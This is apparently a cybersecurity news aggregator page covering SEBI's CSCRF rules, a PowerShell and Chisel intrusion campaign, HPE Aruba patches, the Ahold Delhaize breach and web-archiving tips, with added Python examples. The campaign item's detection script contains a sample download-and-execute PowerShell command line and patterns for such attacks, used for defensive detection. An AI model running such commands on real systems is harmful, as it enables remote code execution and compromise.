Cyber security aggregate rss news

Cyber security aggregator - feeds history

Why SEBI’s New Gui ...

 Features

Beginning in January, investment and financial firms that fall under the Securities and Exchange Board of India (SEBI) will face some of the most comprehensive cybersecurity regulations on the planet. SEBI’s 205-page Cybersecurity and Cyber Resilience Framework (CSCRF) for Regulated Entities (REs) was published in August and will take effect on Jan. 1, 2025 for organizations that are already under existing SEBI cybersecurity circulars, and April 1, 2025 for those that will be covered by CSCRF for the first time.

The document is a well thought-out blueprint for strong cybersecurity, and it requires investment firms, asset managers and other REs to adopt stringent controls and practices that culminate in in-depth auditing and reporting requirements.

Also read: Mandatory Dark Web Monitoring for Indian Companies: SEBI Bolsters Cybersecurity Measures

From Broad Goals and Functions to Specific Practices

The framework is based on the five cyber resiliency goals adopted from the Cyber Crisis Management Plan (CCMP) of the Indian Computer Emergency Response Team (CERT-In): Anticipate, Withstand, Contain, Recover, and Evolve. Those broad goals are linked to six cybersecurity functions: Governance, Identify, Protect, Detect, Respond, and Recover. By focusing on both prevention and resilience, the framework mandates that organizations not only secure their infrastructure but also ensure swift recovery from cyber incidents.

The Anticipate goal within SEBI's framework emphasizes the need for "informed preparedness," effectively positioning cyber threat intelligence (CTI) as a vital tool. By providing real-time insights into threat actors, tactics, and trends, CTI allows organizations to proactively address emerging risks. SEBI mandates that organizations conduct regular risk assessments, threat monitoring, and vulnerability scans, aligning with the intelligence-driven approach recommended for REs to maintain a state of continuous vigilance.

From there, the framework gets very in-depth and specific, and most organizations will need help to meet the guidelines. For example, in the area of threat intelligence, the standards require investment organizations to implement dark web monitoring for brand intelligence and customer protection, including takedown services and monitoring for data and credential leaks, as well as processes for managing and incorporating vulnerability and threat alerts and advisories (see image below). CERT-In and the National Critical Information Infrastructure Protection Centre (NCIIPC) promise some support, but REs may need the services of an AI-powered comprehensive threat intelligence vendor like Cyble to fully meet the requirements.

CSCRF Requirements

The CSCRF document outlines in-depth goals for each area before launching even deeper into specifics.

[Image: CSCRF Guidelines as recommended by SEBI (Source: SEBI)]

After conducting ongoing risk assessments to identify critical systems, the area of Protection, for example, includes eight broad cybersecurity controls that the document addresses in depth later on. These include:

- Authentication and access policy, along with log collection and a documented retention policy
- Network segmentation techniques to restrict access to sensitive information, hosts, and services
- Layering of Full-disk Encryption (FDE) along with File-based Encryption (FE) for data protection
- Separate production and non-production environments for the development of all software/applications for critical systems and feature enhancements
- Periodic audits by a CERT-In empaneled IS auditing organization to assess implementation and compliance
- Vulnerability Assessment and Penetration Testing (VAPT) to detect vulnerabilities in the IT environment for all critical systems, infrastructure components and other IT systems, based on a comprehensive VAPT scope
- Application Programming Interface (API) security and Endpoint security solutions that “shall be implemented with rate limiting, throttling, and proper authentication and authorisation mechanisms”
- Mandatory ISO 27001 certification for Market Infrastructure Institutions (MIIs) and Qualified REs

Other Critical Requirements in SEBI's Framework: Why CTI is Key

Governance and Risk Management: SEBI's guidelines require each RE to maintain a Cybersecurity and Cyber Resilience policy approved by senior management. As cyber threat landscapes evolve, CTI informs these policies by providing insight into sector-specific threats, aiding in more accurate risk evaluation and priority setting.

Continuous Monitoring and Detection: The framework underscores the importance of Security Operations Centers (SOC) and continuous monitoring. By incorporating CTI feeds into SOC workflows, organizations gain insights into active threats and are better positioned to detect anomalies and respond swiftly. SEBI also mandates periodic red teaming exercises, which benefit significantly from CTI data to simulate real-world attack scenarios accurately.

Incident Response and Recovery: SEBI's emphasis on a comprehensive Incident Response Management plan highlights CTI’s role in responding to and recovering from attacks. With intelligence on threat actors and their techniques, organizations can develop proactive response strategies, minimizing the impact of incidents and ensuring rapid recovery.

Benefits of Integrating CTI for SEBI-Regulated Entities

Enhanced Threat Awareness: Regular updates on global threat trends enable organizations to anticipate and mitigate cyber risks more effectively.

Operational Efficiency: By prioritizing threats based on CTI insights, teams can focus on high-risk issues, optimizing resource allocation.

Improved Compliance: Integrating CTI helps meet SEBI's compliance requirements, particularly in areas like real-time threat detection, reporting, and auditing.

Reporting, Response and Beyond

The reporting requirements alone may be a challenge for some; see a sample VAPT report below:

[Image: sample VAPT report]

The framework is meant to be an ongoing, adaptive process. The document states that response should always be followed by further evolution of security controls:

“Adaptive and evolving controls to tackle identified vulnerabilities and to reduce attack surfaces shall be created and incorporated into the RE’s cybersecurity and cyber resilience strategy.”

Closing Notes and Recommendations

In the wake of SEBI’s updated CSCRF, CTI has become essential for security teams across India’s financial sector. By proactively aligning security operations with SEBI’s guidelines and leveraging CTI for informed threat response, organizations can achieve both compliance and resilience. In a landscape where threats are growing more sophisticated and frequent, CTI offers the intelligence edge necessary to defend against emerging risks, ensuring robust protection for critical financial infrastructure.

CSCRF won’t be easy for some organizations to implement, but the end result could be a secure securities industry that’s the envy of the world. And to further help financial institutions gain this edge, CTI platforms like Cyble can be a game changer.

Harnessing Chisel fo ...

 Firewall Daily

The Cyble Research and Intelligence Lab (CRIL) has recently uncovered a sophisticated multi-stage infection chain, primarily driven by PowerShell scripts. This campaign, which targets organizations through a variety of attack vectors, has been designed to maintain persistence, bypass security measures, and enable further malicious activities. One of the most interesting findings from this analysis is the use of the Chisel tunneling tool, which plays a crucial role in the adversary's lateral movement and command-and-control (C&C) operations.

Key Takeaways from the PowerShell Campaign

CRIL's in-depth investigation into this PowerShell-based attack revealed an intricate multi-stage infection process, beginning with a seemingly innocuous LNK file. Once executed, this LNK file triggers the first in a series of obfuscated PowerShell scripts that download additional malicious payloads. Each stage of the infection builds on the last, with the ultimate goal of enabling the threat actor (TA) to maintain a foothold on the compromised system and network.

The use of PowerShell scripts in this campaign highlights the threat actor's proficiency in leveraging native Windows tools to execute complex attack strategies while evading detection. Additionally, the discovery of a Chisel DLL file suggests that the TA is also using this tool to establish covert tunneling connections, allowing them to bypass firewalls and reach protected internal networks.

The Multi-Stage PowerShell Campaign

The attack begins with a malicious LNK (Windows shortcut) file that serves as the initial infection vector. While the exact delivery mechanism of the LNK file is unclear, once executed, it triggers a PowerShell script that begins the infection process. This script, which is obfuscated to avoid detection, downloads and executes a secondary PowerShell script from a remote server. The aim of this first-stage script is to establish persistence on the victim's system by setting up further malicious payloads.

Once the first PowerShell script is executed, it drops a second-stage PowerShell script along with several batch files designed to ensure that the infection persists even after a system reboot. The second-stage script maintains communication with the attacker's C&C server, allowing it to fetch the third and final stage of the infection.

The third-stage PowerShell script is the most complex, continuously communicating with the C&C server to receive a chain of commands. These commands can be used to perform various malicious activities, including data exfiltration, lateral movement within the network, and further payload deployment.

PowerShell and Obfuscation Techniques

A critical component of this attack is the use of PowerShell as the primary tool for executing the attack chain. PowerShell’s powerful capabilities allow the adversary to bypass traditional security mechanisms and remain stealthy. The first PowerShell script, for instance, sets the execution policy to “Bypass,” which allows it to run without being blocked by standard Windows defenses. Additionally, the script is executed in hidden mode, making it invisible to the user.

Second and Third Stages of the Attack

The second-stage PowerShell script maintains communication with the C&C server to retrieve additional malicious payloads. Like the first stage, it decodes and executes these scripts, continuing the infection chain.

In the third stage, the PowerShell script operates with greater complexity. It sets up variables to control its interaction with the C&C server, including $CHAIN for tracking the communication status and $JITTER to introduce random delays to avoid detection by security systems. The script also continues to retrieve system information, such as the hostname, which it Base64-encodes before using it to establish a connection with the server.

At this stage, the script can receive and execute a series of commands from the C&C server. If the command is not a “WAIT” instruction, the script executes the provided PowerShell code. The communication between the infected system and the C&C server is designed to be persistent and stealthy, with data being transferred in small chunks to evade detection by traditional security measures.

Leveraging Chisel for Covert Operations

An intriguing aspect of this campaign is the use of Chisel, a fast TCP/UDP tunneling tool that allows the attacker to establish a secure communication channel over HTTP and bypass firewall restrictions. Chisel is commonly used by threat actors to enable lateral movement within compromised networks and maintain persistence even when traditional communication channels are blocked.

CRIL’s analysis found a Chisel DLL file on the infected system, suggesting that the TA may use Chisel to establish a tunnel between the compromised machine and the C&C server. This tunnel allows the attacker to communicate with internal systems that are otherwise shielded from external access.

The Chisel tool can be used for a variety of malicious purposes. One of the primary functions is to scan internal networks for additional vulnerable systems. By deploying the Chisel client on a compromised machine, the TA can use it as a SOCKS proxy to bypass network defenses and perform reconnaissance using tools like Nmap.

Once internal systems are identified, the attacker can use Chisel to create a tunnel that enables them to move laterally across the network, gaining access to systems that were previously isolated. Furthermore, the Chisel client allows the attacker to enable internet access for machines that may otherwise be disconnected, enabling them to download additional payloads and maintain control over the compromised network.

Proxying and Evasion Techniques

The campaign also utilizes the Netskope proxy, which helps the attacker obfuscate their C&C communication. By routing traffic through the Netskope proxy, the TA can evade detection by traditional network defenses, such as firewalls and intrusion detection systems. This proxy-based communication provides a flexible and secure method for the TA to interact with the infected network and maintain control over the compromised systems.

The use of Chisel in combination with the Netskope proxy allows the attacker to bypass firewalls, scan internal systems, and exfiltrate data without being detected. This multi-layered approach makes it extremely difficult for defenders to identify and block the attack, as it leverages legitimate tools and proxies to hide malicious activity.
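The traits CRIL describes for the first stage (execution policy set to Bypass, hidden window, decoding and download-and-execute of a remote script) are all visible in process-creation telemetry. The scoring below is an added example of how a SOC might flag them; it is not CRIL's or Cyble's detection logic. Field names, the sample events and the "explorer.exe as parent means a user-opened shortcut" rule are assumptions.

```python
"""Flag PowerShell launches that show the traits described in the CRIL
write-up above. Added example, not the vendor's detection logic.
Event field names, the sample records and the parent-process rule are
constructed assumptions; tune thresholds to your own telemetry."""
from __future__ import annotations

import re

# Each indicator: (name, pattern). PowerShell accepts abbreviated switches
# (-ep, -w, -enc, ...), so the patterns accept both long and short forms.
INDICATORS = [
    ("execution-policy-bypass", r"-(?:ep|ex\w*)\s+bypass"),
    ("hidden-window", r"-(?:w|wi\w*)\s+hidden"),
    ("encoded-command", r"-(?:e|ec|en\w*)\s+[A-Za-z0-9+/=]{16,}"),
    ("base64-decode", r"FromBase64String"),
    ("remote-download",
     r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"),
    ("invoke-expression", r"Invoke-Expression|\biex\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in INDICATORS]


def indicators_for(cmdline: str) -> list[str]:
    """Names of the indicators present in a command line, in table order."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]


def is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")


def assess_event(event: dict) -> dict:
    """Return the event annotated with its indicators and a verdict.

    Verdict rule (assumption): two or more indicators. A launch from the
    interactive shell (explorer.exe) counts as one extra indicator, since a
    shortcut the user double-clicks is spawned by explorer.exe."""
    hits = indicators_for(event["cmdline"]) if is_powershell(event["image"]) else []
    from_shell = event.get("parent", "").lower().endswith("explorer.exe")
    if from_shell and hits:
        hits = hits + ["launched-from-explorer"]
    return {**event, "indicators": hits, "suspicious": len(hits) >= 2}


def suspicious_events(events: list[dict]) -> list[dict]:
    return [a for a in (assess_event(e) for e in events) if a["suspicious"]]


# Constructed process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {   # benign scheduled job: no indicators
        "parent": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    },
    {   # shape of the first stage described above (TEST-NET address)
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": ("powershell.exe -ep bypass -w hidden -c "
                    "\"iex (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/stage1.txt')\""),
    },
    {   # not PowerShell: ignored even though the text looks suspicious
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": "cmd.exe /c echo -ep bypass -w hidden",
    },
]

if __name__ == "__main__":
    for hit in suspicious_events(SAMPLE_EVENTS):
        print(hit["indicators"], hit["cmdline"])
```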

HPE Issues Urgent Pa ...

 Cyber News

Hewlett Packard Enterprise (HPE) has issued critical security patches to address several vulnerabilities affecting its Aruba Networking Access Point products. These vulnerabilities, including two particularly severe flaws (CVE-2024-42509 and CVE-2024-47460), could allow unauthenticated attackers to execute arbitrary commands remotely, potentially compromising the security of affected systems. The flaws impact both Instant AOS-8 and AOS-10 software running on various models of Aruba access points, prompting immediate attention from administrators and network security teams.

HPE Security Patches for CVE-2024-42509 and CVE-2024-47460

The security vulnerabilities identified in the Aruba access points could have serious consequences if exploited by malicious actors. HPE released patches to address six vulnerabilities in total, two of which are classified as critical due to their potential for remote code execution (RCE). These vulnerabilities affect several versions of Aruba’s operating systems, Instant AOS-8 and AOS-10.

The most critical of these vulnerabilities, CVE-2024-42509 and CVE-2024-47460, are both command injection flaws in the Command Line Interface (CLI) service. They allow attackers to send specially crafted packets to the PAPI (Aruba's Access Point Management Protocol) UDP port 8211, potentially enabling unauthenticated remote code execution.

CVE-2024-42509: This vulnerability has been assigned a high severity score of 9.8 out of 10. Successful exploitation could allow an attacker to execute arbitrary code as a privileged user on the affected system’s underlying operating system.

CVE-2024-47460: This issue carries a slightly lower severity score of 9.0 but still represents a significant risk. It also enables attackers to execute arbitrary commands remotely, with similar consequences to CVE-2024-42509.

Both vulnerabilities are critical because they allow unauthenticated attackers to gain control over the access point, potentially compromising the entire network.

Affected Versions and Products

The vulnerabilities impact a range of Aruba access point models running specific versions of Instant AOS-8 and AOS-10. The affected versions are as follows:

- Instant AOS-10.4.x.x: Versions 10.4.1.4 and earlier
- Instant AOS-8.12.x.x: Versions 8.12.0.2 and earlier
- Instant AOS-8.10.x.x: Versions 8.10.0.13 and earlier

HPE’s advisory notes that these vulnerabilities do not affect products that have reached End of Maintenance (EoM) status. Therefore, access points running AOS-10.6.x.x, AOS-10.5.x.x, and several earlier versions are not addressed by the current patch release.

Importantly, Aruba’s Mobility Conductor, Mobility Controllers, and SD-WAN Gateways are not affected by these vulnerabilities, nor are Aruba InstantOn Access Points.

Security Patches and Mitigation Recommendations

HPE has released critical security patches to mitigate the risks associated with these vulnerabilities. To address the specific flaws in Instant AOS-8 and AOS-10, users should update their systems to the following patched versions:

- AOS-10.7.x.x: Version 10.7.0.0 and above
- AOS-10.4.x.x: Version 10.4.1.5 and above
- Instant AOS-8.12.x.x: Version 8.12.0.3 and above
- Instant AOS-8.10.x.x: Version 8.10.0.14 and above

These updated software versions contain critical security patches that resolve the vulnerabilities discussed in the advisory. Network administrators are strongly encouraged to apply these patches promptly to ensure the continued security and integrity of their Aruba access point infrastructure.

For devices running Instant AOS-8, HPE recommends enabling cluster security using the cluster-security command. This can help prevent exploitation of CVE-2024-42509 and CVE-2024-47460. For AOS-10 devices, however, the company advises blocking access to UDP port 8211 from untrusted networks, as the cluster security feature is not available for this version.

Additional Security Considerations

While the critical security patches for these vulnerabilities are essential, HPE also provides additional security advice to further safeguard Aruba access points. For example, to mitigate risks related to other vulnerabilities, including authenticated remote command execution and arbitrary file creation, administrators should restrict access to the CLI and web-based management interfaces. It is recommended to segregate these interfaces on a dedicated VLAN or control them through firewall policies to reduce the attack surface.

Several other vulnerabilities were also discovered, including:

- CVE-2024-47461: An authenticated remote code execution flaw with a severity of 7.2 (high) that can be exploited by attackers with privileged access to the system.
- CVE-2024-47462, CVE-2024-47463: Arbitrary file creation vulnerabilities that could lead to remote command execution.
- CVE-2024-47464: A path traversal vulnerability that could give attackers unauthorized access to files.

These vulnerabilities emphasize the need for a comprehensive approach to network security, beyond just patching critical bugs. By implementing robust access controls and ensuring that all management interfaces are properly secured, organizations can reduce the likelihood of successful exploitation.

The Importance of Timely Patching

The release of these HPE security patches highlights the ongoing need for organizations to maintain a proactive approach to cybersecurity. Timely application of patches for critical vulnerabilities, such as the ones impacting Aruba access points, is essential for protecting network infrastructure from potential exploitation.

Security experts recommend that organizations establish a routine patch management process, ensuring that security updates, like those for the Aruba access point vulnerabilities, are deployed as soon as they become available. This helps minimize the window of opportunity for attackers and reduces the risk of compromise.
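Working out which access points in an estate still need the fix means comparing four-part AOS version numbers against the affected and fixed releases quoted above, and pairing each unpatched device with the interim mitigation HPE names for its branch. The script below is an added example (not HPE's or Aruba's tooling); the version boundaries and mitigations are taken from the article, the inventory is constructed.

```python
"""Triage Aruba AP firmware versions against the HPE advisory for
CVE-2024-42509 / CVE-2024-47460 as summarised in the article above.
Added example, not vendor tooling. Version boundaries and interim
mitigations come from the article; the inventory below is constructed."""
from __future__ import annotations

# First fixed release per branch (major.minor). Anything lower in the same
# branch is affected according to the advisory.
FIXED_BY_BRANCH = {
    (10, 7): (10, 7, 0, 0),
    (10, 4): (10, 4, 1, 5),
    (8, 12): (8, 12, 0, 3),
    (8, 10): (8, 10, 0, 14),
}


def parse_version(text: str) -> tuple[int, ...]:
    """'8.12.0.2' -> (8, 12, 0, 2). Integer tuples compare correctly where
    plain strings do not ('8.12.0.10' sorts before '8.12.0.3' as text)."""
    parts = tuple(int(p) for p in text.strip().split("."))
    if len(parts) != 4:
        raise ValueError(f"expected four dotted components: {text!r}")
    return parts


def assess(version_text: str) -> str:
    """Return 'patched', 'affected' or 'unsupported-branch'."""
    version = parse_version(version_text)
    fixed = FIXED_BY_BRANCH.get(version[:2])
    if fixed is None:
        # Branches such as 10.5.x.x / 10.6.x.x receive no fix in this
        # release (the article notes they are End of Maintenance), so they
        # need a manual decision rather than a version comparison.
        return "unsupported-branch"
    return "patched" if version >= fixed else "affected"


def mitigation(version_text: str) -> str:
    """Interim workaround named in the advisory for an unpatched device."""
    major = parse_version(version_text)[0]
    if major == 8:
        return "enable cluster security (cluster-security command)"
    if major == 10:
        # AOS-10 has no cluster-security feature; restrict the PAPI port.
        return "block UDP port 8211 from untrusted networks"
    raise ValueError(f"not an AOS-8 or AOS-10 version: {version_text!r}")


def triage(inventory: list[tuple[str, str]]) -> list[tuple[str, str, str, str]]:
    """Return (hostname, version, status, action) rows, affected first."""
    rows = []
    for host, version in inventory:
        status = assess(version)
        action = "none" if status == "patched" else mitigation(version)
        rows.append((host, version, status, action))
    order = {"affected": 0, "unsupported-branch": 1, "patched": 2}
    return sorted(rows, key=lambda r: (order[r[2]], r[0]))


# Constructed inventory for demonstration (hostnames are made up).
SAMPLE_INVENTORY = [
    ("ap-lobby-01", "8.12.0.2"),
    ("ap-lobby-02", "8.12.0.3"),
    ("ap-floor3-07", "10.4.1.4"),
    ("ap-floor3-08", "10.4.1.10"),
    ("ap-legacy-01", "10.6.0.2"),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_INVENTORY):
        print("  ".join(row))
```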

Ahold Delhaize Confi ...

 Firewall Daily

Ahold Delhaize, one of the world’s largest grocery and eCommerce companies, is grappling with a cybersecurity breach affecting its U.S. operations. The Ahold Delhaize cyberattack, which has been linked to a nationwide disruption in payments and services, has led to a series of measures taken by the company to mitigate the impact and protect its systems. Ahold Delhaize USA, the American subsidiary of the Dutch multinational, confirmed the issue on November 8, 2024, announcing that certain systems had been taken offline to contain the breach.

The Ahold Delhaize data breach primarily impacted a number of the company’s U.S. pharmacy locations and eCommerce operations across various platforms. Among the affected brands are major grocery chains such as Food Lion, The Giant Company, Hannaford, Stop & Shop, and Giant Food. While these stores remained open for business, some services, particularly pharmacy transactions and online orders, were disrupted for several days.

Immediate Response to the Ahold Delhaize Cyberattack

Upon detecting the cyberattack on Ahold Delhaize USA’s network, security teams moved swiftly into action. In a statement released on November 8, the company disclosed that it had enlisted external cybersecurity experts and notified law enforcement agencies to assist in the ongoing investigation.

“We immediately began investigating the issue with the help of external cybersecurity experts,” the company said in its statement. “We have also notified law enforcement, and our teams are taking steps to assess and mitigate the issue. This includes taking some systems offline to help protect them.”

Despite the breach, Ahold Delhaize confirmed that all its U.S. stores remained operational, although certain services were temporarily unavailable. For example, several Hannaford locations in Maine were unable to process debit card or gift card transactions, and the Hannaford website was down for several days. Similarly, other Ahold Delhaize USA pharmacies and eCommerce platforms faced disruptions as the company worked to secure its network.

Impact on Ahold Delhaize USA Brands

The cyberattack on Ahold Delhaize USA has had wide-reaching effects across the company’s various U.S. brands. Ahold Delhaize’s flagship supermarkets, including Food Lion and Stop & Shop, were among the hardest hit, though all stores remained open for business. However, customers were warned about potential delays in product deliveries and restocking efforts.

In some locations, particularly those served by Hannaford and Stop & Shop, in-store signage informed customers that technology outages might affect their shopping experience, including product delivery timelines. The company issued an apology for any inconvenience caused and reassured customers that the security of their personal information remained a top priority.

The incident has raised concerns about the vulnerability of large retail and grocery networks to cyberattacks, particularly as data extortion and ransomware attacks continue to rise globally.

Ahold Delhaize's Commitment to Addressing the Cyberattack

In response to the ongoing data breach at Ahold Delhaize, the company emphasized that it was actively working to resolve the issue and minimize any further disruptions. In its official statement, Ahold Delhaize reassured customers and partners that its teams were focused on both the immediate and long-term recovery efforts.

“We are taking extensive measures to further protect our systems and ensure the security of our customers, associates, and partners,” the company said. “We deeply apologize for any inconvenience this issue may have caused and are committed to restoring full service as quickly as possible.”

Despite the ongoing nature of the investigation and remediation, Ahold Delhaize remains confident that the breach has not compromised any customer data. The company’s security teams are working tirelessly to ensure that the network is fully secured and that affected services will be restored in due course.

Broader Context: The Rise of Cybersecurity Threats in 2024

The cyberattack on Ahold Delhaize USA comes at a time when data breaches and cyberattacks are increasingly targeting large corporations. Experts have dubbed 2024 the "Year of the Cyberattack," with a surge in ransomware, data extortion, and other malicious activities targeting businesses and consumers alike. As organizations across the globe continue to digitize operations, the risks associated with cyber threats have never been more pronounced.

Ahold Delhaize itself has faced a challenging year, with several other factors affecting its performance. In addition to the cybersecurity breach, the company reported a dip in quarterly sales, primarily due to product recalls, store closures, and the divestment of its FreshDirect subsidiary. The Listeria outbreak involving Boar's Head deli meats, which led to a mass recall, further impacted the company's bottom line.

Despite these challenges, Ahold Delhaize has been able to maintain growth in online sales, with a particular emphasis on its e-commerce grocery platforms. The company’s commitment to innovation and technology is seen as a key driver of its long-term growth, even in the face of disruptions like the current cyberattack.

How to save web page ...

 Tips

Contrary to the popular belief that anything online stays online, the internet doesnt remember everything. In a previous post in this series, we examined no fewer than nine scenarios in which you could lose access to online content. We also provided a detailed guide to what information you absolutely must (and   show more ...

preferably quickly) back up to your computer and how to do it. Today, well discuss how to easily save web pages to your computer, how to organize these archives, and what to do if your favorite site has gone AWOL. Lets say you want to save a blog post with a recipe, compile a bibliography for your research paper, or even preserve a specific online publication for legal purposes. All of the above are published as web pages — which have a tendency to disappear at the wrong moment. Want to reminisce about music news and gossip from 2005? Good luck with that — the MTV News site shut down and all its articles and interviews are no longer available. Check references in Wikipedia articles? 11% of them lead nowhere, even though they were working when the article was published. This phenomenon of link rot — the gradual deletion or relocation of online content — is rapidly becoming a major problem. 38% of pages that existed ten years ago are no longer accessible today. So, if theres a web page out there that you like or need, the wise move would be to create a backup. How to save a web page to your computer Since a web page consists of dozens or even hundreds of files, backing it up will require a bit of effort. Here are the main ways to do it: Save only the text as an HTML file. Select the Save page as menu command or button in your browser and then select Webpage, HTML Only. This will only save the text of the web page, without any graphics or other eye candy. Save text and images. The Webpage, Complete option will create, besides an HTML file, a folder with the same name containing all graphic elements, styles, and scripts from the page. A downside of this option is that saving a lot of auxiliary files clutters your drive. The Webpage, Single File option is more convenient, bundling the web page and all its resources into a single .mhtml file. This will open freely in Chrome or Edge, but other browsers may have issues. 
This option is not available in all browsers, but if you install the SingleFile extension (available for most browsers), you can save the entire web page and its media content as a single HTML file that opens perfectly fine in all modern browsers. Print to PDF. To preserve the main content of the page, but scrap menus and banners, your best option is Print to PDF. The resulting file will open on any computer. With any of these options, make sure that the main text that you actually want to keep is still readable when you open the document. An easier way to save a web page The methods described above are a bit time-consuming and create clutter on your hard drive. For greater convenience, use a dedicated service such as Pocket (formerly Read It Later), wallabag, or Raindrop.io. They all work the same way: you send a link from which the service retrieves a document with all the illustrations, cleans the page of anything unnecessary, and saves it in your personal online storage. Even if the original page gets deleted or modified, the version you want will remain in your archive. These services allow you to group and sort your links, search for text inside, and view your saved pages on any device. For desktop, theres an extension available for all the major browsers; and for mobile, theres an app. All these services offer an eternal archive only with a premium subscription, meaning youll have to pay for the convenience. That said, Wallabag is open-source — you can install it on your own server and not pay for third-party services or worry about the service getting shut down. Some note-taking apps can also save complete web pages. These include Evernote, where the feature is called Web Clipper. How to save a web page for others If its not just a copy for yourself that you need, but to share a certain version of the page with others, youll need a public-archiving service. The best-known is the Internet Archive (archive.org) and its Wayback Machine. 
Other options include archive.today (aka archive.is), perma.cc, and megalodon.jp. They all work on a similar principle: either at the user's request or automatically, they visit web pages and save a copy on their servers.

To request archiving of a web page, go to web.archive.org and enter the full address in the Save Page Now box. After you click Save, a window appears describing all of the page's loaded components, followed by a permanent link to the site in its preserved state. It looks like this: https://web.archive.org/web/20240924045754/https://www.kaspersky.com/blog. The link shows both the address of the saved page and the exact time of saving, which is perfect for archival purposes. Registering on archive.org lets you manage a collection of such links, take screenshots of saved sites, and download copies of them in the special web-archiving format.

(Image: On archive.org, you can view previously saved versions of websites and save the current state of any site, for example, our blog.)

On opening the archive link, you'll see the saved page with a timestamp indicating when the snapshot was taken. This feature is useful for tracking and demonstrating changes in website data: price fluctuations, product description updates, edited news reports, and deleted information. The latter is particularly important for historical and cultural researchers working with defunct websites. Below, you can check out one of the first versions of GeoCities, a once-popular web-hosting service that let you create home pages, express yourself, and find friends with shared interests long before social networks. It's only thanks to the Wayback Machine that we can see it now: the site closed shop in 2009.

(Image: A gift for the old-timers: one of the earliest versions of GeoCities.com.)

How to find deleted internet content or an old version of a website

To view an old version of any website:

1. Open archive.org.
2. Enter the full address of the website or a specific page in the box next to the logo and press Enter. If the exact URL is unknown, you can enter the name of the website or words that describe it well.
3. Select the desired website from the list. The results show at a glance how many copies are archived and for what period.
4. Use the calendar to select which of the saved copies of the site you wish to view. Dates for which there is a saved copy are circled; the larger the circle, the more copies were made that day.
5. Click the desired date and inspect the saved site. Note that loading a copy from the archive may take a few minutes. The calendar graph above the site copy lets you navigate to older and newer copies.

(Image: How to explore old versions of sites at web.archive.org.)

You can copy the link to the retrieved copy from the address bar to access the archived site directly, bypassing the search interface.

What if archive.org can't help

The foundation behind archive.org sometimes complies with requests from copyright holders and other authorized parties to exclude certain sites from the Wayback Machine. Also, the service never aimed to preserve the entire internet, so it may happen that the page you need was never indexed. In such cases, try looking for it in other time capsules.

Archive.today (aka archive.is) doesn't automatically save pages; it does so only at the request of users. Among other things, this does away with having to follow instructions for search robots (robots.txt), and means that the archive contains documents that aren't available in the Wayback Machine.

Another important web-archiving project is perma.cc, created by a consortium of major world libraries. However, it's only free for participating organizations. Individual users can subscribe to a paid plan, with pricing based on the number of archived links.

A powerful alternative to specialized archives is search engines' cached content. To index any web page, search engines retrieve its text, so a crude but readable version of almost any page can be found there. For a long time, Google's cache was the most accessible, but in early 2024, the search giant removed the direct link to its cache from search results. The service still works, but accessing it directly is very difficult. Therefore, it's better to use browser extensions that make internet archives easier to work with. For example, if a link takes you to a deleted page or a defunct website, the Web Archives extension redirects you straight to an archived copy of the page at web.archive.org, archive.today, or perma.cc, or shows a cached version of it from Google, Bing, or Yandex.

How to save data from other online services

Besides web pages, there are many other online services, from photo albums and notes to social networks, that hold data you may also want to save. Of course, recommendations vary for different types of data and specific services, but for your convenience, we've grouped all related instructions under the backup tag. You can read about creating backups for: Notion, Telegram, WhatsApp, 2FA authenticator apps, and other services. And don't forget to safeguard your backups against ransomware and spyware!
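The snapshot-link format and the "tracking changes in website data" use case above can both be driven without a browser. The following is an added example, not code from the Kaspersky article: it parses Wayback Machine snapshot links, builds a query against the Wayback CDX capture index (the public `/cdx/search/cdx` endpoint with its `url`, `from`, `to`, `output`, `fl` and `limit` parameters), picks the capture nearest a given time, and uses the per-capture content digest to find the points at which a page actually changed. The CDX response embedded in the block is constructed sample data for a hypothetical example.com page so that everything runs offline.

```python
# Added example (not from the Kaspersky article): work with Wayback Machine
# snapshot links and the CDX capture index without a browser.
# The URL layout and the CDX API parameters are the real public interface;
# SAMPLE_CDX_JSON below is CONSTRUCTED data so the code runs offline.
import json
import re
from datetime import datetime, timezone
from urllib.parse import urlencode

WAYBACK = "https://web.archive.org"

# https://web.archive.org/web/<timestamp>[flags]/<original URL>
# <timestamp> is YYYYMMDDhhmmss (UTC) and may be truncated, e.g. "2024";
# an optional flag such as "id_" requests the raw capture without the toolbar.
_SNAPSHOT_RE = re.compile(
    r"^https?://web\.archive\.org/web/(?P<ts>\d{4,14})(?P<flags>[a-z]{2}_)?/(?P<url>.+)$"
)


def to_datetime(ts):
    """Expand a (possibly truncated) Wayback timestamp to an aware UTC datetime."""
    ts = ts + "0101000000"[len(ts) - 4:]  # pad missing month/day/time
    return datetime.strptime(ts, "%Y%m%d%H%M%S").replace(tzinfo=timezone.utc)


def to_timestamp(when):
    """Inverse of to_datetime: aware datetime -> 14-digit Wayback timestamp."""
    return when.astimezone(timezone.utc).strftime("%Y%m%d%H%M%S")


def parse_snapshot_url(link):
    """Split a snapshot link into (capture time, original URL)."""
    m = _SNAPSHOT_RE.match(link)
    if not m:
        raise ValueError(f"not a Wayback snapshot URL: {link}")
    return to_datetime(m.group("ts")), m.group("url")


def snapshot_url(original_url, when, raw=False):
    """Link to the capture closest to `when`; raw=True adds the id_ flag."""
    return f"{WAYBACK}/web/{to_timestamp(when)}{'id_' if raw else ''}/{original_url}"


def cdx_query_url(original_url, start=None, end=None, limit=200):
    """CDX API query listing captures of `original_url` as JSON rows."""
    params = {"url": original_url, "output": "json",
              "fl": "timestamp,original,statuscode,digest", "limit": limit}
    if start:
        params["from"] = to_timestamp(start)
    if end:
        params["to"] = to_timestamp(end)
    return f"{WAYBACK}/cdx/search/cdx?" + urlencode(params)


def parse_cdx_json(body):
    """CDX JSON output is a list of rows whose first row is the field header."""
    rows = json.loads(body)
    return [dict(zip(rows[0], r)) for r in rows[1:]] if rows else []


def closest_capture(captures, when, ok_only=True):
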